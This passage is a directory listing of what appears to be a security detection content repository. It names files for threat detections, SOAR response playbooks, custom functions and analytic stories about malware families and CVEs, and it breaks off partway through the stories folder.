├── detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.json
├── detect_dns_data_exfiltration_using_pretrained_model_in_dsdl.yml
├── detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.ipynb
├── detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.json
├── detect_suspicious_dns_txt_records_using_pretrained_model_in_dsdl.yml
├── detect_suspicious_processnames_using_pretrained_model_in_dsdl.ipynb
├── detect_suspicious_processnames_using_pretrained_model_in_dsdl.json
├── detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml
├── pretrained_dga_detection.yml
├── pretrained_dga_model_dsdl.ipynb
└── pretrained_dga_model_dsdl.json
├── playbooks
├── AD_LDAP_Account_Locking.json
├── AD_LDAP_Account_Locking.png
├── AD_LDAP_Account_Locking.py
├── AD_LDAP_Account_Locking.yml
├── AD_LDAP_Account_Unlocking.json
├── AD_LDAP_Account_Unlocking.png
├── AD_LDAP_Account_Unlocking.py
├── AD_LDAP_Account_Unlocking.yml
├── AD_LDAP_Entity_Attribute_Lookup.json
├── AD_LDAP_Entity_Attribute_Lookup.png
├── AD_LDAP_Entity_Attribute_Lookup.py
├── AD_LDAP_Entity_Attribute_Lookup.yml
├── AWS_IAM_Account_Locking.json
├── AWS_IAM_Account_Locking.png
├── AWS_IAM_Account_Locking.py
├── AWS_IAM_Account_Locking.yml
├── AWS_IAM_Account_Unlocking.json
├── AWS_IAM_Account_Unlocking.png
├── AWS_IAM_Account_Unlocking.py
├── AWS_IAM_Account_Unlocking.yml
├── Active_Directory_Disable_Account_Dispatch.json
├── Active_Directory_Disable_Account_Dispatch.png
├── Active_Directory_Disable_Account_Dispatch.py
├── Active_Directory_Disable_Account_Dispatch.yml
├── Active_Directory_Enable_Account_Dispatch.json
├── Active_Directory_Enable_Account_Dispatch.png
├── Active_Directory_Enable_Account_Dispatch.py
├── Active_Directory_Enable_Account_Dispatch.yml
├── Attribute_Lookup_Dispatch.json
├── Attribute_Lookup_Dispatch.png
├── Attribute_Lookup_Dispatch.py
├── Attribute_Lookup_Dispatch.yml
├── Automated_Enrichment.json
├── Automated_Enrichment.png
├── Automated_Enrichment.py
├── Automated_Enrichment.yml
├── Azure_AD_Account_Locking.json
├── Azure_AD_Account_Locking.png
├── Azure_AD_Account_Locking.py
├── Azure_AD_Account_Locking.yml
├── Azure_AD_Account_Unlocking.json
├── Azure_AD_Account_Unlocking.png
├── Azure_AD_Account_Unlocking.py
├── Azure_AD_Account_Unlocking.yml
├── Azure_AD_Graph_User_Attribute_Lookup.json
├── Azure_AD_Graph_User_Attribute_Lookup.png
├── Azure_AD_Graph_User_Attribute_Lookup.py
├── Azure_AD_Graph_User_Attribute_Lookup.yml
├── CiscoTalosIntelligence_Identifier_Reputation_Analysis.png
├── Cisco_Talos_Intelligence_Identifier_Reputation_Analysis.json
├── Cisco_Talos_Intelligence_Identifier_Reputation_Analysis.py
├── Cisco_Talos_Intelligence_Identifier_Reputation_Analysis.yml
├── Cisco_Umbrella_DNS_Denylisting.json
├── Cisco_Umbrella_DNS_Denylisting.png
├── Cisco_Umbrella_DNS_Denylisting.py
├── Cisco_Umbrella_DNS_Denylisting.yml
├── CrowdStrike_OAuth_API_Device_Attribute_Lookup.json
├── CrowdStrike_OAuth_API_Device_Attribute_Lookup.png
├── CrowdStrike_OAuth_API_Device_Attribute_Lookup.py
├── CrowdStrike_OAuth_API_Device_Attribute_Lookup.yml
├── CrowdStrike_OAuth_API_Dynamic_Analysis.json
├── CrowdStrike_OAuth_API_Dynamic_Analysis.png
├── CrowdStrike_OAuth_API_Dynamic_Analysis.py
├── CrowdStrike_OAuth_API_Dynamic_Analysis.yml
├── CrowdStrike_OAuth_API_Identifier_Activity_Analysis.json
├── CrowdStrike_OAuth_API_Identifier_Activity_Analysis.png
├── CrowdStrike_OAuth_API_Identifier_Activity_Analysis.py
├── CrowdStrike_OAuth_API_Identifier_Activity_Analysis.yml
├── DNS_Denylisting_Dispatch.json
├── DNS_Denylisting_Dispatch.png
├── DNS_Denylisting_Dispatch.py
├── DNS_Denylisting_Dispatch.yml
├── Dynamic_Analysis_Dispatch.json
├── Dynamic_Analysis_Dispatch.png
├── Dynamic_Analysis_Dispatch.py
├── Dynamic_Analysis_Dispatch.yml
├── G_Suite_for_GMail_Message_Identifier_Activity_Analysis.json
├── G_Suite_for_GMail_Message_Identifier_Activity_Analysis.png
├── G_Suite_for_GMail_Message_Identifier_Activity_Analysis.py
├── G_Suite_for_GMail_Message_Identifier_Activity_Analysis.yml
├── G_Suite_for_Gmail_Message_Eviction.json
├── G_Suite_for_Gmail_Message_Eviction.png
├── G_Suite_for_Gmail_Message_Eviction.py
├── G_Suite_for_Gmail_Message_Eviction.yml
├── G_Suite_for_Gmail_Search_and_Purge.json
├── G_Suite_for_Gmail_Search_and_Purge.png
├── G_Suite_for_Gmail_Search_and_Purge.py
├── G_Suite_for_Gmail_Search_and_Purge.yml
├── Identifier_Activity_Analysis_Dispatch.json
├── Identifier_Activity_Analysis_Dispatch.png
├── Identifier_Activity_Analysis_Dispatch.py
├── Identifier_Activity_Analysis_Dispatch.yml
├── Identifier_Reputation_Analysis_Dispatch.json
├── Identifier_Reputation_Analysis_Dispatch.png
├── Identifier_Reputation_Analysis_Dispatch.py
├── Identifier_Reputation_Analysis_Dispatch.yml
├── Jira_Related_Tickets_Search.json
├── Jira_Related_Tickets_Search.png
├── Jira_Related_Tickets_Search.py
├── Jira_Related_Tickets_Search.yml
├── MS_Graph_for_Office_365_Message_Eviction.json
├── MS_Graph_for_Office_365_Message_Eviction.png
├── MS_Graph_for_Office_365_Message_Eviction.py
├── MS_Graph_for_Office_365_Message_Eviction.yml
├── MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.json
├── MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.png
├── MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.py
├── MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.yml
├── MS_Graph_for_Office_365_Message_Restore.json
├── MS_Graph_for_Office_365_Message_Restore.png
├── MS_Graph_for_Office_365_Message_Restore.py
├── MS_Graph_for_Office_365_Message_Restore.yml
├── MS_Graph_for_Office_365_Search_and_Purge.json
├── MS_Graph_for_Office_365_Search_and_Purge.png
├── MS_Graph_for_Office_365_Search_and_Purge.py
├── MS_Graph_for_Office_365_Search_and_Purge.yml
├── MS_Graph_for_Office_365_Search_and_Restore.json
├── MS_Graph_for_Office_365_Search_and_Restore.png
├── MS_Graph_for_Office_365_Search_and_Restore.py
├── MS_Graph_for_Office_365_Search_and_Restore.yml
├── Panorama_Outbound_Traffic_Filtering.json
├── Panorama_Outbound_Traffic_Filtering.png
├── Panorama_Outbound_Traffic_Filtering.py
├── Panorama_Outbound_Traffic_Filtering.yml
├── PhishTank_URL_Reputation_Analysis.json
├── PhishTank_URL_Reputation_Analysis.png
├── PhishTank_URL_Reputation_Analysis.py
├── PhishTank_URL_Reputation_Analysis.yml
├── Related_Tickets_Search_Dispatch.json
├── Related_Tickets_Search_Dispatch.png
├── Related_Tickets_Search_Dispatch.py
├── Related_Tickets_Search_Dispatch.yml
├── ServiceNow_Related_Tickets_Search.json
├── ServiceNow_Related_Tickets_Search.png
├── ServiceNow_Related_Tickets_Search.py
├── ServiceNow_Related_Tickets_Search.yml
├── Splunk_Attack_Analyzer_Dynamic_Analysis.json
├── Splunk_Attack_Analyzer_Dynamic_Analysis.png
├── Splunk_Attack_Analyzer_Dynamic_Analysis.py
├── Splunk_Attack_Analyzer_Dynamic_Analysis.yml
├── Splunk_Automated_Email_Investigation.json
├── Splunk_Automated_Email_Investigation.png
├── Splunk_Automated_Email_Investigation.py
├── Splunk_Automated_Email_Investigation.yml
├── Splunk_Identifier_Activity_Analysis.json
├── Splunk_Identifier_Activity_Analysis.png
├── Splunk_Identifier_Activity_Analysis.py
├── Splunk_Identifier_Activity_Analysis.yml
├── Splunk_Message_Identifier_Activity_Analysis.json
├── Splunk_Message_Identifier_Activity_Analysis.png
├── Splunk_Message_Identifier_Activity_Analysis.py
├── Splunk_Message_Identifier_Activity_Analysis.yml
├── Splunk_Notable_Related_Tickets_Search.json
├── Splunk_Notable_Related_Tickets_Search.png
├── Splunk_Notable_Related_Tickets_Search.py
├── Splunk_Notable_Related_Tickets_Search.yml
├── URL_Outbound_Traffic_Filtering_Dispatch.json
├── URL_Outbound_Traffic_Filtering_Dispatch.png
├── URL_Outbound_Traffic_Filtering_Dispatch.py
├── URL_Outbound_Traffic_Filtering_Dispatch.yml
├── UrlScan_IO_Dynamic_Analysis.json
├── UrlScan_IO_Dynamic_Analysis.png
├── UrlScan_IO_Dynamic_Analysis.py
├── UrlScan_IO_Dynamic_Analysis.yml
├── VirusTotal_v3_Dynamic_Analysis.json
├── VirusTotal_v3_Dynamic_Analysis.png
├── VirusTotal_v3_Dynamic_Analysis.py
├── VirusTotal_v3_Dynamic_Analysis.yml
├── VirusTotal_v3_Identifier_Reputation_Analysis.json
├── VirusTotal_v3_Identifier_Reputation_Analysis.png
├── VirusTotal_v3_Identifier_Reputation_Analysis.py
├── VirusTotal_v3_Identifier_Reputation_Analysis.yml
├── Windows_Defender_ATP_Identifier_Activity_Analysis.json
├── Windows_Defender_ATP_Identifier_Activity_Analysis.png
├── Windows_Defender_ATP_Identifier_Activity_Analysis.py
├── Windows_Defender_ATP_Identifier_Activity_Analysis.yml
├── Zscaler_Outbound_Traffic_Filtering.json
├── Zscaler_Outbound_Traffic_Filtering.png
├── Zscaler_Outbound_Traffic_Filtering.py
├── Zscaler_Outbound_Traffic_Filtering.yml
├── activedirectory_reset_password.json
├── activedirectory_reset_password.png
├── activedirectory_reset_password.py
├── activedirectory_reset_password.yml
├── aws_disable_user_accounts.json
├── aws_disable_user_accounts.png
├── aws_disable_user_accounts.py
├── aws_disable_user_accounts.yml
├── aws_find_inactive_users.json
├── aws_find_inactive_users.png
├── aws_find_inactive_users.py
├── aws_find_inactive_users.yml
├── block_indicators.json
├── block_indicators.png
├── block_indicators.py
├── block_indicators.yml
├── crowdstrike_malware_triage.json
├── crowdstrike_malware_triage.png
├── crowdstrike_malware_triage.py
├── crowdstrike_malware_triage.yml
├── custom_functions
│ ├── artifact_create.json
│ ├── artifact_create.py
│ ├── artifact_update.json
│ ├── artifact_update.py
│ ├── asset_get_attributes.json
│ ├── asset_get_attributes.py
│ ├── base64_decode.json
│ ├── base64_decode.py
│ ├── collect_by_cef_type.json
│ ├── collect_by_cef_type.py
│ ├── container_merge.json
│ ├── container_merge.py
│ ├── container_update.json
│ ├── container_update.py
│ ├── custom_list_enumerate.json
│ ├── custom_list_enumerate.py
│ ├── custom_list_value_in_strings.json
│ ├── custom_list_value_in_strings.py
│ ├── datetime_modify.json
│ ├── datetime_modify.py
│ ├── debug.json
│ ├── debug.py
│ ├── find_related_containers.json
│ ├── find_related_containers.py
│ ├── indicator_collect.json
│ ├── indicator_collect.py
│ ├── indicator_get_by_tag.json
│ ├── indicator_get_by_tag.py
│ ├── indicator_tag.json
│ ├── indicator_tag.py
│ ├── json_safe_format.json
│ ├── json_safe_format.py
│ ├── list_deduplicate.json
│ ├── list_deduplicate.py
│ ├── list_drop_none.json
│ ├── list_drop_none.py
│ ├── list_merge.json
│ ├── list_merge.py
│ ├── mark_evidence.json
│ ├── mark_evidence.py
│ ├── noop.json
│ ├── noop.py
│ ├── passthrough.json
│ ├── passthrough.py
│ ├── playbooks_list.json
│ ├── playbooks_list.py
│ ├── regex_extract_email.json
│ ├── regex_extract_email.py
│ ├── regex_extract_ipv4.json
│ ├── regex_extract_ipv4.py
│ ├── regex_filter_list.json
│ ├── regex_filter_list.py
│ ├── regex_split.json
│ ├── regex_split.py
│ ├── string_split.json
│ ├── string_split.py
│ ├── string_to_lowercase.json
│ ├── string_to_lowercase.py
│ ├── string_to_uppercase.json
│ ├── string_to_uppercase.py
│ ├── url_parse.json
│ ├── url_parse.py
│ ├── workbook_add.json
│ ├── workbook_add.py
│ ├── workbook_list.json
│ ├── workbook_list.py
│ ├── workbook_task_update.json
│ ├── workbook_task_update.py
│ ├── zip_extract.json
│ └── zip_extract.py
├── delete_detected_files.json
├── delete_detected_files.png
├── delete_detected_files.py
├── delete_detected_files.yml
├── email_notification_for_malware.json
├── email_notification_for_malware.png
├── email_notification_for_malware.py
├── email_notification_for_malware.yml
├── hunting.json
├── hunting.png
├── hunting.py
├── hunting.yml
├── internal_host_splunk_investigate_log4j.json
├── internal_host_splunk_investigate_log4j.png
├── internal_host_splunk_investigate_log4j.py
├── internal_host_splunk_investigate_log4j.yml
├── internal_host_ssh_investigate.json
├── internal_host_ssh_investigate.png
├── internal_host_ssh_investigate.py
├── internal_host_ssh_investigate.yml
├── internal_host_ssh_log4j_investigate.json
├── internal_host_ssh_log4j_investigate.png
├── internal_host_ssh_log4j_investigate.py
├── internal_host_ssh_log4j_investigate.yml
├── internal_host_ssh_log4j_respond.json
├── internal_host_ssh_log4j_respond.png
├── internal_host_ssh_log4j_respond.py
├── internal_host_ssh_log4j_respond.yml
├── internal_host_winrm_investigate.json
├── internal_host_winrm_investigate.png
├── internal_host_winrm_investigate.py
├── internal_host_winrm_investigate.yml
├── internal_host_winrm_log4j_investigate.json
├── internal_host_winrm_log4j_investigate.png
├── internal_host_winrm_log4j_investigate.py
├── internal_host_winrm_log4j_investigate.yml
├── internal_host_winrm_log4j_respond.json
├── internal_host_winrm_log4j_respond.png
├── internal_host_winrm_log4j_respond.py
├── internal_host_winrm_log4j_respond.yml
├── log4j_investigate.json
├── log4j_investigate.png
├── log4j_investigate.py
├── log4j_investigate.yml
├── log4j_respond.json
├── log4j_respond.png
├── log4j_respond.py
├── log4j_respond.yml
├── malware_hunt_and_contain.json
├── malware_hunt_and_contain.png
├── malware_hunt_and_contain.py
├── malware_hunt_and_contain.yml
├── ransomware_investigate_and_contain.json
├── ransomware_investigate_and_contain.png
├── ransomware_investigate_and_contain.py
├── ransomware_investigate_and_contain.yml
├── risk_notable_block_indicators.json
├── risk_notable_block_indicators.png
├── risk_notable_block_indicators.py
├── risk_notable_block_indicators.yml
├── risk_notable_enrich.json
├── risk_notable_enrich.png
├── risk_notable_enrich.py
├── risk_notable_enrich.yml
├── risk_notable_import_data.json
├── risk_notable_import_data.png
├── risk_notable_import_data.py
├── risk_notable_import_data.yml
├── risk_notable_investigate.json
├── risk_notable_investigate.png
├── risk_notable_investigate.py
├── risk_notable_investigate.yml
├── risk_notable_merge_events.json
├── risk_notable_merge_events.png
├── risk_notable_merge_events.py
├── risk_notable_merge_events.yml
├── risk_notable_mitigate.json
├── risk_notable_mitigate.png
├── risk_notable_mitigate.py
├── risk_notable_mitigate.yml
├── risk_notable_preprocess.json
├── risk_notable_preprocess.png
├── risk_notable_preprocess.py
├── risk_notable_preprocess.yml
├── risk_notable_protect_assets_and_users.json
├── risk_notable_protect_assets_and_users.png
├── risk_notable_protect_assets_and_users.py
├── risk_notable_protect_assets_and_users.yml
├── risk_notable_review_indicators.json
├── risk_notable_review_indicators.png
├── risk_notable_review_indicators.py
├── risk_notable_review_indicators.yml
├── risk_notable_verdict.json
├── risk_notable_verdict.png
├── risk_notable_verdict.py
├── risk_notable_verdict.yml
├── start_investigation.json
├── start_investigation.png
├── start_investigation.py
├── start_investigation.yml
├── threat_intel_investigate.json
├── threat_intel_investigate.png
├── threat_intel_investigate.py
├── threat_intel_investigate.yml
├── trustar_enrich_indicators.json
├── trustar_enrich_indicators.png
├── trustar_enrich_indicators.py
└── trustar_enrich_indicators.yml
├── removed
├── baselines
│ ├── add_prohibited_processes_to_enterprise_security.yml
│ ├── baseline_of_api_calls_per_user_arn.yml
│ ├── baseline_of_excessive_aws_instances_launched_by_user___mltk.yml
│ ├── baseline_of_excessive_aws_instances_terminated_by_user___mltk.yml
│ ├── monitor_successful_backups.yml
│ ├── monitor_unsuccessful_backups.yml
│ ├── previously_seen_api_call_per_user_roles_in_cloudtrail.yml
│ ├── previously_seen_aws_cross_account_activity.yml
│ ├── previously_seen_aws_cross_account_activity___initial.yml
│ ├── previously_seen_aws_cross_account_activity___update.yml
│ ├── previously_seen_aws_provisioning_activity_sources.yml
│ ├── previously_seen_aws_regions.yml
│ ├── previously_seen_ec2_amis.yml
│ ├── previously_seen_ec2_instance_types.yml
│ ├── previously_seen_ec2_launches_by_user.yml
│ ├── previously_seen_ec2_modifications_by_user.yml
│ ├── previously_seen_users_in_cloudtrail.yml
│ ├── systems_ready_for_spectre_meltdown_windows_patch.yml
│ └── update_previously_seen_users_in_cloudtrail.yml
├── deprecation_mapping.YML
├── detections
│ ├── abnormally_high_aws_instances_launched_by_user.yml
│ ├── abnormally_high_aws_instances_launched_by_user___mltk.yml
│ ├── abnormally_high_aws_instances_terminated_by_user.yml
│ ├── abnormally_high_aws_instances_terminated_by_user___mltk.yml
│ ├── account_discovery_with_net_app.yml
│ ├── asl_aws_createaccesskey.yml
│ ├── asl_aws_excessive_security_scanning.yml
│ ├── asl_aws_password_policy_changes.yml
│ ├── attempt_to_stop_security_service.yml
│ ├── attempted_credential_dump_from_registry_via_reg_exe.yml
│ ├── aws_cloud_provisioning_from_previously_unseen_city.yml
│ ├── aws_cloud_provisioning_from_previously_unseen_country.yml
│ ├── aws_cloud_provisioning_from_previously_unseen_ip_address.yml
│ ├── aws_cloud_provisioning_from_previously_unseen_region.yml
│ ├── aws_cross_account_activity_from_previously_unseen_account.yml
│ ├── aws_detect_attach_to_role_policy.yml
│ ├── aws_detect_permanent_key_creation.yml
│ ├── aws_detect_role_creation.yml
│ ├── aws_detect_sts_assume_role_abuse.yml
│ ├── aws_detect_sts_get_session_token_abuse.yml
│ ├── aws_eks_kubernetes_cluster_sensitive_object_access.yml
│ ├── aws_saml_access_by_provider_user_and_principal.yml
│ ├── change_default_file_association.yml
│ ├── clients_connecting_to_multiple_dns_servers.yml
│ ├── cloud_network_access_control_list_deleted.yml
│ ├── cmdline_tool_not_executed_in_cmd_shell.yml
│ ├── correlation_by_repository_and_risk.yml
│ ├── correlation_by_user_and_risk.yml
│ ├── create_local_admin_accounts_using_net_exe.yml
│ ├── deleting_of_net_users.yml
│ ├── detect_activity_related_to_pass_the_hash_attacks.yml
│ ├── detect_api_activity_from_users_without_mfa.yml
│ ├── detect_aws_api_activities_from_unapproved_accounts.yml
│ ├── detect_critical_alerts_from_security_tools.yml
│ ├── detect_dns_requests_to_phishing_sites_leveraging_evilginx2.yml
│ ├── detect_large_outbound_icmp_packets.yml
│ ├── detect_long_dns_txt_record_response.yml
│ ├── detect_mimikatz_using_loaded_images.yml
│ ├── detect_mimikatz_via_powershell_and_eventcode_4703.yml
│ ├── detect_new_api_calls_from_user_roles.yml
│ ├── detect_new_user_aws_console_login.yml
│ ├── detect_processes_used_for_system_network_configuration_discovery.yml
│ ├── detect_spike_in_aws_api_activity.yml
│ ├── detect_spike_in_network_acl_activity.yml
│ ├── detect_spike_in_security_group_activity.yml
│ ├── detect_usb_device_insertion.yml
│ ├── detect_web_traffic_to_dynamic_domain_providers.yml
│ ├── detect_webshell_exploit_behavior.yml
│ ├── detection_of_dns_tunnels.yml
│ ├── disabling_net_user_account.yml
│ ├── dns_query_requests_resolved_by_unauthorized_dns_servers.yml
│ ├── dns_record_changed.yml
│ ├── domain_account_discovery_with_net_app.yml
│ ├── domain_group_discovery_with_net.yml
│ ├── dump_lsass_via_procdump_rename.yml
│ ├── ec2_instance_modified_with_previously_unseen_user.yml
│ ├── ec2_instance_started_in_previously_unseen_region.yml
│ ├── ec2_instance_started_with_previously_unseen_ami.yml
│ ├── ec2_instance_started_with_previously_unseen_instance_type.yml
│ ├── ec2_instance_started_with_previously_unseen_user.yml
│ ├── elevated_group_discovery_with_net.yml
│ ├── excel_spawning_powershell.yml
│ ├── excel_spawning_windows_script_host.yml
│ ├── excessive_service_stop_attempt.yml
│ ├── excessive_usage_of_net_app.yml
│ ├── execution_of_file_with_spaces_before_extension.yml
│ ├── extended_period_without_successful_netbackup_backups.yml
│ ├── extraction_of_registry_hives.yml
│ ├── first_time_seen_command_line_argument.yml
│ ├── gcp_detect_accounts_with_high_risk_roles_by_project.yml
│ ├── gcp_detect_high_risk_permissions_by_resource_and_account.yml
│ ├── gcp_detect_oauth_token_abuse.yml
│ ├── gcp_kubernetes_cluster_scan_detection.yml
│ ├── github_actions_disable_security_workflow.yml
│ ├── github_commit_changes_in_master.yml
│ ├── github_commit_in_develop.yml
│ ├── github_dependabot_alert.yml
│ ├── github_pull_request_from_unknown_user.yml
│ ├── identify_new_user_accounts.yml
│ ├── known_services_killed_by_ransomware.yml
│ ├── kubernetes_aws_detect_most_active_service_accounts_by_pod.yml
│ ├── kubernetes_aws_detect_rbac_authorization_by_account.yml
│ ├── kubernetes_aws_detect_sensitive_role_access.yml
│ ├── kubernetes_aws_detect_service_accounts_forbidden_failure_access.yml
│ ├── kubernetes_azure_active_service_accounts_by_pod_namespace.yml
│ ├── kubernetes_azure_detect_rbac_authorization_by_account.yml
│ ├── kubernetes_azure_detect_sensitive_object_access.yml
│ ├── kubernetes_azure_detect_sensitive_role_access.yml
│ ├── kubernetes_azure_detect_service_accounts_forbidden_failure_access.yml
│ ├── kubernetes_azure_detect_suspicious_kubectl_calls.yml
│ ├── kubernetes_azure_pod_scan_fingerprint.yml
│ ├── kubernetes_azure_scan_fingerprint.yml
│ ├── kubernetes_gcp_detect_most_active_service_accounts_by_pod.yml
│ ├── kubernetes_gcp_detect_rbac_authorizations_by_account.yml
│ ├── kubernetes_gcp_detect_sensitive_object_access.yml
│ ├── kubernetes_gcp_detect_sensitive_role_access.yml
│ ├── kubernetes_gcp_detect_service_accounts_forbidden_failure_access.yml
│ ├── kubernetes_gcp_detect_suspicious_kubectl_calls.yml
│ ├── linux_auditd_find_private_keys.yml
│ ├── local_account_discovery_with_net.yml
│ ├── monitor_dns_for_brand_abuse.yml
│ ├── mshtml_module_load_in_office_product.yml
│ ├── multiple_okta_users_with_invalid_credentials_from_the_same_ip.yml
│ ├── net_localgroup_discovery.yml
│ ├── network_connection_discovery_with_net.yml
│ ├── o365_suspicious_admin_email_forwarding.yml
│ ├── o365_suspicious_rights_delegation.yml
│ ├── o365_suspicious_user_email_forwarding.yml
│ ├── office_application_drop_executable.yml
│ ├── office_application_spawn_regsvr32_process.yml
│ ├── office_application_spawn_rundll32_process.yml
│ ├── office_document_creating_schedule_task.yml
│ ├── office_document_executing_macro_code.yml
│ ├── office_document_spawned_child_process_to_download.yml
│ ├── office_product_spawn_cmd_process.yml
│ ├── office_product_spawning_bitsadmin.yml
│ ├── office_product_spawning_certutil.yml
│ ├── office_product_spawning_mshta.yml
│ ├── office_product_spawning_rundll32_with_no_dll.yml
│ ├── office_product_spawning_windows_script_host.yml
│ ├── office_product_spawning_wmic.yml
│ ├── office_product_writing_cab_or_inf.yml
│ ├── office_spawning_control.yml
│ ├── okta_account_locked_out.yml
│ ├── okta_account_lockout_events.yml
│ ├── okta_failed_sso_attempts.yml
│ ├── okta_threatinsight_login_failure_with_high_unknown_users.yml
│ ├── okta_threatinsight_suspected_passwordspray_attack.yml
│ ├── okta_two_or_more_rejected_okta_pushes.yml
│ ├── osquery_pack___coldroot_detection.yml
│ ├── password_policy_discovery_with_net.yml
│ ├── processes_created_by_netsh.yml
│ ├── prohibited_software_on_endpoint.yml
│ ├── reg_exe_used_to_hide_files_directories_via_registry_keys.yml
│ ├── remote_desktop_network_bruteforce.yml
│ ├── remote_registry_key_modifications.yml
│ ├── remote_system_discovery_with_net.yml
│ ├── scheduled_tasks_used_in_badrabbit_ransomware.yml
│ ├── spectre_and_meltdown_vulnerable_systems.yml
│ ├── suspicious_changes_to_file_associations.yml
│ ├── suspicious_driver_loaded_path.yml
│ ├── suspicious_email___uba_anomaly.yml
│ ├── suspicious_event_log_service_behavior.yml
│ ├── suspicious_file_write.yml
│ ├── suspicious_powershell_command_line_arguments.yml
│ ├── suspicious_process_file_path.yml
│ ├── suspicious_rundll32_rename.yml
│ ├── suspicious_writes_to_system_volume_information.yml
│ ├── uncommon_processes_on_endpoint.yml
│ ├── unsigned_image_loaded_by_lsass.yml
│ ├── unsuccessful_netbackup_backups.yml
│ ├── web_fraud___account_harvesting.yml
│ ├── web_fraud___anomalous_user_clickspeed.yml
│ ├── web_fraud___password_sharing_across_accounts.yml
│ ├── windows_command_shell_fetch_env_variables.yml
│ ├── windows_connhost_exe_started_forcefully.yml
│ ├── windows_dll_search_order_hijacking_hunt.yml
│ ├── windows_hosts_file_modification.yml
│ ├── windows_lateral_tool_transfer_remcom.yml
│ ├── windows_modify_registry_reg_restore.yml
│ ├── windows_msiexec_with_network_connections.yml
│ ├── windows_network_share_interaction_with_net.yml
│ ├── windows_office_product_spawning_msdt.yml
│ ├── windows_query_registry_reg_save.yml
│ ├── windows_service_created_within_public_path.yml
│ ├── windows_service_stop_via_net__and_sc_application.yml
│ ├── windows_valid_account_with_never_expires_password.yml
│ ├── winword_spawning_cmd.yml
│ ├── winword_spawning_powershell.yml
│ └── winword_spawning_windows_script_host.yml
├── investigations
│ ├── all_backup_logs_for_host.yml
│ ├── amazon_eks_kubernetes_activity_by_src_ip.yml
│ ├── aws_investigate_security_hub_alerts_by_dest.yml
│ ├── aws_investigate_user_activities_by_accesskeyid.yml
│ ├── aws_investigate_user_activities_by_arn.yml
│ ├── aws_network_acl_details_from_id.yml
│ ├── aws_network_interface_details_via_resourceid.yml
│ ├── aws_s3_bucket_details_via_bucketname.yml
│ ├── gcp_kubernetes_activity_by_src_ip.yml
│ ├── get_all_aws_activity_from_city.yml
│ ├── get_all_aws_activity_from_country.yml
│ ├── get_all_aws_activity_from_ip_address.yml
│ ├── get_all_aws_activity_from_region.yml
│ ├── get_backup_logs_for_endpoint.yml
│ ├── get_certificate_logs_for_a_domain.yml
│ ├── get_dns_server_history_for_a_host.yml
│ ├── get_dns_traffic_ratio.yml
│ ├── get_ec2_instance_details_by_instanceid.yml
│ ├── get_ec2_launch_details.yml
│ ├── get_email_info.yml
│ ├── get_emails_from_specific_sender.yml
│ ├── get_first_occurrence_and_last_occurrence_of_a_mac_address.yml
│ ├── get_history_of_email_sources.yml
│ ├── get_logon_rights_modifications_for_endpoint.yml
│ ├── get_logon_rights_modifications_for_user.yml
│ ├── get_notable_history.yml
│ ├── get_outbound_emails_to_hidden_cobra_threat_actors.yml
│ ├── get_parent_process_info.yml
│ ├── get_process_file_activity.yml
│ ├── get_process_info.yml
│ ├── get_process_information_for_port_activity.yml
│ ├── get_process_responsible_for_the_dns_traffic.yml
│ ├── get_sysmon_wmi_activity_for_host.yml
│ ├── get_web_session_information_via_session_id.yml
│ ├── investigate_aws_activities_via_region_name.yml
│ ├── investigate_aws_user_activities_by_user_field.yml
│ ├── investigate_failed_logins_for_multiple_destinations.yml
│ ├── investigate_network_traffic_from_src_ip.yml
│ ├── investigate_okta_activity_by_app.yml
│ ├── investigate_okta_activity_by_ip_address.yml
│ ├── investigate_pass_the_hash_attempts.yml
│ ├── investigate_pass_the_ticket_attempts.yml
│ ├── investigate_previous_unseen_user.yml
│ ├── investigate_successful_remote_desktop_authentications.yml
│ ├── investigate_suspicious_strings_in_http_header.yml
│ ├── investigate_user_activities_in_okta.yml
│ └── investigate_web_posts_from_src.yml
└── stories
│ ├── aws_cross_account_activity.yml
│ ├── aws_cryptomining.yml
│ ├── aws_suspicious_provisioning_activities.yml
│ ├── common_phishing_frameworks.yml
│ ├── container_implantation_monitoring_and_investigation.yml
│ ├── earth_estries.yml
│ ├── host_redirection.yml
│ ├── kubernetes_sensitive_role_activity.yml
│ ├── lateral_movement.yml
│ ├── monitor_backup_solution.yml
│ ├── monitor_for_unauthorized_software.yml
│ ├── nexus_apt_threat_activity.yml
│ ├── office_365_detections.yml
│ ├── spectre_and_meltdown_vulnerabilities.yml
│ ├── suspicious_aws_ec2_activities.yml
│ ├── unusual_aws_ec2_modifications.yml
│ └── web_fraud_detection.yml
├── requirements.txt
├── stories
├── 3cx_supply_chain_attack.yml
├── abnormal_kubernetes_behavior_using_splunk_infrastructure_monitoring.yml
├── acidpour.yml
├── acidrain.yml
├── active_directory_discovery.yml
├── active_directory_kerberos_attacks.yml
├── active_directory_lateral_movement.yml
├── active_directory_password_spraying.yml
├── active_directory_privilege_escalation.yml
├── adobe_coldfusion_arbitrary_code_execution_cve_2023_29298_cve_2023_26360.yml
├── agenttesla.yml
├── amadey.yml
├── amos_stealer.yml
├── apache_struts_vulnerability.yml
├── apache_tomcat_session_deserialization_attacks.yml
├── apt29_diplomatic_deceptions_with_wineloader.yml
├── asset_tracking.yml
├── asyncrat.yml
├── atlassian_confluence_server_and_data_center_cve_2022_26134.yml
├── awfulshred.yml
├── aws_bedrock_security.yml
├── aws_defense_evasion.yml
├── aws_iam_privilege_escalation.yml
├── aws_identity_and_access_management_account_takeover.yml
├── aws_network_acl_activity.yml
├── aws_s3_bucket_security_monitoring.yml
├── aws_security_hub_alerts.yml
├── aws_user_monitoring.yml
├── azorult.yml
├── azure_active_directory_account_takeover.yml
├── azure_active_directory_persistence.yml
├── azure_active_directory_privilege_escalation.yml
├── backdoor_pingpong.yml
├── baron_samedit_cve_2021_3156.yml
├── bishopfox_sliver_adversary_emulation_framework.yml
├── bits_jobs.yml
├── black_basta_ransomware.yml
├── blackbyte_ransomware.yml
├── blacklotus_campaign.yml
├── blackmatter_ransomware.yml
├── blacksuit_ransomware.yml
├── brand_monitoring.yml
├── braodo_stealer.yml
├── brute_ratel_c4.yml
├── cactus_ransomware.yml
├── caddy_wiper.yml
├── chaos_ransomware.yml
├── china_nexus_threat_activity.yml
├── cisa_aa22_257a.yml
├── cisa_aa22_264a.yml
├── cisa_aa22_277a.yml
